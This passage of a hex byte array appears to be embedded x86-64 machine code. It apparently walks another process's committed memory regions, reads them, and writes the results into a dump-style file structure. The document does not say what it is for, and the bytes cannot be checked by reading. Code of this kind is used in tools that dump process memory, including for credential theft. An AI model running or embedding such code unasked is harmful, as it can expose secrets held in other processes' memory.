xE9,0xD6,0x00,0x00,0x00,0x48,0x8D,0x55,0x8C,0x48,0x8B,0x45,0x10,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x24,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x82,0xF9,0xFF,0xFF,0x48,0x8D,0x95,0x4C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x61,0xF9,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x8B,0x40,0x10,0x89,0x85,0x48,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x89,0x85,0x44,0xFF,0xFF,0xFF,0x48,0x8D,0x95,0x44,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0xB8,0x04,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x74,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x56,0x48,0x8B,0x45,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC8,0x48,0x8B,0x45,0xD0,0x48,0x8B,0x50,0x08,0x48,0x8B,0x45,0x10,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x48,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x2A,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8D,0x50,0x18,0x48,0x8D,0x8D,0x48,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x10,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xCF,0xF8,0xFF,0xFF,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xE0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0xD8,0x01,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x70,0x01,0x00,0x00,0x48,0x8D,0x05,0x72,0x54,0x00,0x00,0x48,0x89,0x85,0xA0,0x00,0x00,0x00,0x48,0x8D,0x05,0x7A,0x54,0x00,0x00,0x48,0x89,0x85,0xA8,0x00,0x00,0x00,0x48,0x8D,0x05,0x82,0x54,0x00,0x00,0x48,0x89,0x85,0xB0,0x00,0x00,0x00,0x48,0x8D,0x05,0x88,0x54,0x00,0x00,0x48,0x89,0x85,0xB8,0x00,0x00,0x00,0x48,0x8D,0x05,0x92,0x54,0x00,0x00,0x48,0x89,0x85,0xC0,0x00,0x00,0x00,0x48,0x8D,0x05,0x9E,0x54,0x00,0x00,0x48,0x89,0x85,0xC8,0x00,0x00,0x00,0x48,0x8D,0x05,0xA8,0x54,0x00,0x00,0x48,0x89,0x85,0xD0,0x00,0x00,0x00,0x48,0x8D,0x05,0xB4,0x54,0x00,0x00,0x48,0x89,0x85,0xD8,0x00,0x00,0x00,0x48,0x8D,0x05,0xBC,0x54,0x00,0x00,0x48,0x89,0x85,0xE0,0x00,0x00,0x00,0x48,0x8D,0x05,0xC8,0x54,0x00,0x00,0x48,0x89,0x85,0xE8,0x00,0x00,0x00,0x48,0x8D,0x05,0xCE,0x54,0x00,0x00,0x48,0x89,0x85,0xF0,0x00,0x00,0x00,0x48,0x8D,0x05,0xD6,0x54,0x00,0x00,0x48,0x89,0x85,0xF8,0x00,0x00,0x00,0x48,0x8D,0x05,0xDE,0x54,0x00,0x00,0x48,0x89,0x85,0x00,0x01,0x00,0x00,0x48,0x8D,0x05,0xE6,0x54,0x00,0x00,0x48,0x89,0x85,0x08,0x01,0x00,0x00,0x48,0x8D,0x05,0xF6,0x54,0x00,0x00,0x48,0x89,0x85,0x10,0x01,0x00,0x00,0x48,0x8D,0x05,0x02,0x55,0x00,0x00,0x48,0x89,0x85,0x18,0x01,0x00,0x00,0x48,0x8D,0x05,0x0C,0x55,0x00,0x00,0x48,0x89,0x85,0x20,0x01,0x00,0x00,0x48,0x8D,0x05,0x16,0x55,0x00,0x00,0x48,0x89,0x85,0x28,0x01,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x48,0x8B,0x00,0x48,0x8D,0x95,0xA0,0x00,0x00,0x00,0x41,0xB9,0x01,0x00,0x00,0x00,0x41,0xB8,0x12,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x31,0xDB,0xFF,0xFF,0x48,0x89,0x85,0x40,0x01,0x00,0x00,0x48,0x83,0xBD,0x40,0x01,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x05,0x06,0x00,0x00,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0xC7,0x85,0x9C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0xF6,0x00,0x00,0x00,0x8B,0x85,0x9C,0x00,0x00,0x00,0x83,0xC0,0x01,0x89,0x85,0x9C,0x00,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x8B,0x50,0x10,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x89,0x90,0x14,0x02,0x00,0x00,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x83,0xC0,0x14,0xBA,0x00,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x72,0x30,0x00,0x00,0x89,0x45,0x18,0x8B,0x45,0x18,0x83,0xC0,0x01,0x89,0x45,0x18,0x8B,0x45,0x18,0x01,0xC0,0x89,0x45,0x18,0x48,0x8D,0x55,0x18,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB8,0x04,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2E,0xF7,0xFF,0xFF,0x85,0xC0,0x75,0x29,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x86,0xD2,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x50,0x05,0x00,0x00,0x8B,0x4D,0x18,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8D,0x50,0x14,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xE1,0xF6,0xFF,0xFF,0x85,0xC0,0x75,0x29,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x39,0xD2,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x03,0x05,0x00,0x00,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8B,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0x48,0x83,0xBD,0x48,0x01,0x00,0x00,0x00,0x0F,0x85,0xFC,0xFE,0xFF,0xFF,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x8B,0x40,0x10,0x89,0x85,0x98,0x00,0x00,0x00,0x48,0x8D,0x95,0x9C,0x00,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB8,0x04,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x69,0xF6,0xFF,0xFF,0x85,0xC0,0x75,0x29,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC1,0xD1,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x8B,0x04,0x00,0x00,0x48,0xC7,0x45,0x20,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x30,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x38,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x48,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x58,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x60,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x68,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x70,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x78,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x7C,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x84,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0xE9,0x9C,0x03,0x00,0x00,0x48,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x0E,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x48,0x89,0x45,0xA0,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x40,0x10,0x89,0x45,0xA8,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x80,0x1C,0x02,0x00,0x00,0x89,0x45,0xAC,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x80,0x18,0x02,0x00,0x00,0x89,0x45,0xB0,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x80,0x14,0x02,0x00,0x00,0x89,0x45,0xB4,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x08,0x00,0x00,0x00,0x00,0xC7,0x85,0x3C,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x48,0x8B,0x45,0xA0,0x48,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x08,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xA8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xAC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xB0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xB4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xB8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xBC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xC0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xC4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xC8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xCC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xD0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xD4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xD8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xDC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xE0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xE4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xE8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xEC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xF0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xF4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xF8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x48,0x8B,0x45,0x00,0x48,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x08,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x48,0x8B,0x45,0x08,0x48,0x89,0x02,0x48,0x8D,0x55,0x20,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB8,0x6C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x55,0xF2,0xFF,0xFF,0x85,0xC0,0x75,0x26,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAD,0xCD,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x7A,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8B,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0x48,0x83,0xBD,0x48,0x01,0x00,0x00,0x00,0x0F,0x85,0x56,0xFC,0xFF,0xFF,0x8B,0x85,0x9C,0x00,0x00,0x00,0x6B,0xC0,0x6C,0x83,0xC0,0x04,0x89,0x45,0x1C,0x48,0x8D,0x55,0x1C,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x30,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x93,0xF1,0xFF,0xFF,0x48,0x8D,0x95,0x98,0x00,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x34,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x6F,0xF1,0xFF,0xFF,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0x48,0x81,0xC4,0xD8,0x01,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x8B,0x45,0x18,0x48,0x89,0x45,0xF8,0xEB,0x40,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x08,0x48,0x8B,0x55,0x10,0x48,0x39,0xC2,0x72,0x24,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x08,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x10,0x89,0xC0,0x48,0x01,0xD0,0x48,0x8B,0x55,0x10,0x48,0x39,0xC2,0x73,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x17,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0xB9,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xA0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x90,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x00,0x4C,0x8D,0x45,0x90,0x8B,0x4D,0xDC,0x48,0x8B,0x55,0xF0,0x48,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x30,0x00,0x00,0x00,0x4D,0x89,0xC1,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xA0,0xDF,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x88,0x99,0x01,0x00,0x00,0x48,0x8B,0x45,0x90,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xA8,0x48,0x89,0x45,0xC8,0x48,0x8B,0x55,0xD0,0x48,0x8B,0x45,0xC8,0x48,0x01,0xC2,0x48,0x8B,0x45,0xD0,0x48,0x39,0xC2,0x0F,0x82,0x74,0x01,0x00,0x00,0x48,0x8B,0x55,0xD0,0x48,0x8B,0x45,0xC8,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x8B,0x45,0xB0,0x3D,0x00,0x10,0x00,0x00,0x0F,0x85,0x2A,0x01,0x00,0x00,0x8B,0x45,0xB8,0x3D,0x00,0x00,0x04,0x00,0x0F,0x84,0x22,0x01,0x00,0x00,0x8B,0x45,0xB4,0x83,0xE0,0x01,0x85,0xC0,0x0F,0x85,0x1A,0x01,0x00,0x00,0x8B,0x45,0xB4,0x25,0x00,0x01,0x00,0x00,0x85,0xC0,0x0F,0x85,0x10,0x01,0x00,0x00,0x8B,0x45,0xB4,0x83,0xE0,0x10,0x85,0xC0,0x0F,0x85,0x08,0x01,0x00,0x00,0x8B,0x45,0xB8,0x3D,0x00,0x00,0x00,0x01,0x75,0x18,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0xD0,0x48,0x89,0xC1,0xE8,0x7B,0xFE,0xFF,0xFF,0x85,0xC0,0x0F,0x84,0xEC,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x08,0x48,0x39,0x45,0xD0,0x0F,0x84,0xE0,0x00,0x00,0x00,0x48,0x8B,0x05,0xF8,0xBC,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x28,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xE9,0xBC,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xC0,0x48,0x83,0x7D,0xC0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC7,0x00,0x00,0x00,0x48,0x8B,0x45,0xC0,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x55,0xD0,0x48,0x8B,0x45,0xC0,0x48,0x89,0x50,0x08,0x48,0x8B,0x45,0xC0,0x48,0x8B,0x55,0xC8,0x48,0x89,0x50,0x10,0x8B,0x55,0xB0,0x48,0x8B,0x45,0xC0,0x89,0x50,0x18,0x8B,0x55,0xB4,0x48,0x8B,0x45,0xC0,0x89,0x50,0x1C,0x8B,0x55,0xB8,0x48,0x8B,0x45,0xC0,0x89,0x50,0x20,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0x48,0x8B,0x45,0xC0,0x48,0x89,0x45,0xF8,0xEB,0x2C,0x48,0x8B,0x45,0xF8,0x48,0x89,0x45,0xE0,0xEB,0x0B,0x48,0x8B,0x45,0xE0,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x8B,0x00,0x48,0x85,0xC0,0x75,0xE9,0x48,0x8B,0x45,0xE0,0x48,0x8B,0x55,0xC0,0x48,0x89,0x10,0x83,0x45,0xEC,0x01,0xE9,0x52,0xFE,0xFF,0xFF,0x90,0xE9,0x4C,0xFE,0xFF,0xFF,0x90,0xE9,0x46,0xFE,0xFF,0xFF,0x90,0xE9,0x40,0xFE,0xFF,0xFF,0x90,0xE9,0x3A,0xFE,0xFF,0xFF,0x90,0xE9,0x34,0xFE,0xFF,0xFF,0x90,0xE9,0x2E,0xFE,0xFF,0xFF,0x90,0xE9,0x28,0xFE,0xFF,0xFF,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF8,0x48,0x81,0xC4,0xA0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x78,0x48,0x8D,0x6C,0x24,0x70,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x48,0x8B,0x45,0x20,0x8B,0x40,0x10,0x89,0x45,0xE0,0x48,0x8B,0x55,0x28,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0xE8,0x9B,0xFD,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x76,0x03,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xF8,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xEB,0x17,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC0,0x01,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0xE2,0x48,0x8D,0x55,0xD8,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x7B,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD6,0xC9,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x09,0x03,0x00,0x00,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC0,0x01,0x48,0xC1,0xE0,0x04,0xBA,0xFF,0xFF,0xFF,0xFF,0x48,0x39,0xC2,0x73,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x9D,0xC9,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xD0,0x02,0x00,0x00,0x48,0x8B,0x45,0xD8,0x83,0xC0,0x01,0xC1,0xE0,0x04,0x89,0x45,0xD4,0x8B,0x45,0xE0,0x89,0xC2,0x8B,0x45,0xD4,0x89,0xC0,0x48,0x01,0xD0,0x48,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC8,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE7,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x42,0xC9,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x75,0x02,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xF8,0xE9,0x8D,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8D,0x50,0x08,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x99,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF4,0xC8,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x27,0x02,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8D,0x50,0x10,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x58,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB3,0xC8,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xE6,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x0F,0x85,0x68,0xFF,0xFF,0xFF,0x48,0x8D,0x55,0xD4,0x48,0x8B,0x45,0x20,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x3C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB4,0xEC,0xFF,0xFF,0x48,0x8D,0x55,0xE0,0x48,0x8B,0x45,0x20,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x40,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x96,0xEC,0xFF,0xFF,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xF8,0xE9,0x78,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x58,0x10,0x48,0x8B,0x05,0xBA,0xB9,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xAE,0xB9,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x4D,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x48,0x10,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x08,0x49,0x89,0xC2,0x48,0x8B,0x45,0x20,0x48,0x8B,0x00,0x48,0x8B,0x55,0xE8,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0x4C,0x89,0xD2,0x48,0x89,0xC1,0xE8,0xD6,0xD9,0xFF,0xFF,0x89,0x45,0xE4,0x48,0x8B,0x45,0xF8,0x48,